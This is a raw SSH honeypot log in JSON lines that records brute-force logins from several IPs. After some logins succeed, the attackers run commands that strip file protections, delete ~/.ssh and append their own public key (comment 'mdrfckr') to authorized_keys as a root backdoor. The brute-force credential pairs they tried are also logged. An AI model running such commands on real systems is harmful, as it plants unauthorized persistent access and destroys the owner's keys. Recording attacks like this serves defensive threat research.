{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":49956,"dst_ip":"1.2.3.4","dst_port":22,"session":"331febf0d46e","protocol":"ssh","message":"New connection: 158.51.124.56:49956 (1.2.3.4:22) [session: 331febf0d46e]","sensor":"my-vps","timestamp":"2025-09-08T15:16:00.352160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:16:00.352825Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:16:00.493047Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa147258369","message":"login attempt [root/Aa147258369] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:16:01.094948Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:16:01.431941Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:16:01.432668Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:16:01.433707Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:16:01.575370Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:16:01.914878Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:16:01.915586Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:16:02.057786Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:16:02.058704Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":50578,"dst_ip":"1.2.3.4","dst_port":22,"session":"39461c853898","protocol":"ssh","message":"New connection: 158.51.124.56:50578 (1.2.3.4:22) [session: 39461c853898]","sensor":"my-vps","timestamp":"2025-09-08T15:16:02.194690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:16:02.195701Z","src_ip":"158.51.124.56","session":"39461c853898"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:16:02.334213Z","src_ip":"158.51.124.56","session":"39461c853898"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:16:02.928023Z","src_ip":"158.51.124.56","session":"39461c853898"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:16:04.068627Z","src_ip":"158.51.124.56","session":"39461c853898"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":51626,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e9297f2d504","protocol":"ssh","message":"New connection: 158.51.124.56:51626 (1.2.3.4:22) [session: 8e9297f2d504]","sensor":"my-vps","timestamp":"2025-09-08T15:16:04.206652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:16:04.207326Z","src_ip":"158.51.124.56","session":"8e9297f2d504"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:16:04.346435Z","src_ip":"158.51.124.56","session":"8e9297f2d504"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:16:04.942062Z","src_ip":"158.51.124.56","session":"8e9297f2d504"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:16:05.083262Z","src_ip":"158.51.124.56","session":"8e9297f2d504"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:16:05.084140Z","src_ip":"158.51.124.56","session":"331febf0d46e"}
{"eventid":"cowrie.session.closed","duration":31.20746684074402,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:16:22.515632Z","src_ip":"41.43.102.98","session":"e25362194c9a"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":59634,"dst_ip":"1.2.3.4","dst_port":22,"session":"965542c6cc8a","protocol":"ssh","message":"New connection: 185.255.91.51:59634 (1.2.3.4:22) [session: 965542c6cc8a]","sensor":"my-vps","timestamp":"2025-09-08T15:16:47.490646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:16:47.495568Z","src_ip":"185.255.91.51","session":"965542c6cc8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:16:47.595650Z","src_ip":"185.255.91.51","session":"965542c6cc8a"}
{"eventid":"cowrie.login.failed","username":"dmdba","password":"12345","message":"login attempt [dmdba/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T15:16:48.000634Z","src_ip":"185.255.91.51","session":"965542c6cc8a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:16:49.106821Z","src_ip":"185.255.91.51","session":"965542c6cc8a"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":33180,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a83fdeb6999","protocol":"ssh","message":"New connection: 185.255.91.51:33180 (1.2.3.4:22) [session: 8a83fdeb6999]","sensor":"my-vps","timestamp":"2025-09-08T15:17:56.821983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:17:56.827936Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:17:56.917925Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa147258369","message":"login attempt [root/Aa147258369] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:17:57.282480Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:17:57.533388Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:17:57.534130Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:17:57.535362Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:17:57.633831Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:17:57.932578Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:17:57.933296Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:17:58.026521Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:17:58.027472Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":33190,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f97fd406e65","protocol":"ssh","message":"New connection: 185.255.91.51:33190 (1.2.3.4:22) [session: 5f97fd406e65]","sensor":"my-vps","timestamp":"2025-09-08T15:17:58.140087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:17:58.141083Z","src_ip":"185.255.91.51","session":"5f97fd406e65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:17:58.242149Z","src_ip":"185.255.91.51","session":"5f97fd406e65"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:17:58.686775Z","src_ip":"185.255.91.51","session":"5f97fd406e65"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:17:59.789965Z","src_ip":"185.255.91.51","session":"5f97fd406e65"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":33204,"dst_ip":"1.2.3.4","dst_port":22,"session":"52ea12159291","protocol":"ssh","message":"New connection: 185.255.91.51:33204 (1.2.3.4:22) [session: 52ea12159291]","sensor":"my-vps","timestamp":"2025-09-08T15:17:59.887727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:17:59.888452Z","src_ip":"185.255.91.51","session":"52ea12159291"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:17:59.989487Z","src_ip":"185.255.91.51","session":"52ea12159291"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:18:00.443305Z","src_ip":"185.255.91.51","session":"52ea12159291"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:18:00.604962Z","src_ip":"185.255.91.51","session":"8a83fdeb6999"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:18:00.615701Z","src_ip":"185.255.91.51","session":"52ea12159291"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":42042,"dst_ip":"1.2.3.4","dst_port":22,"session":"61657082b849","protocol":"ssh","message":"New connection: 185.255.91.51:42042 (1.2.3.4:22) [session: 61657082b849]","sensor":"my-vps","timestamp":"2025-09-08T15:19:05.509408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:19:05.521027Z","src_ip":"185.255.91.51","session":"61657082b849"}
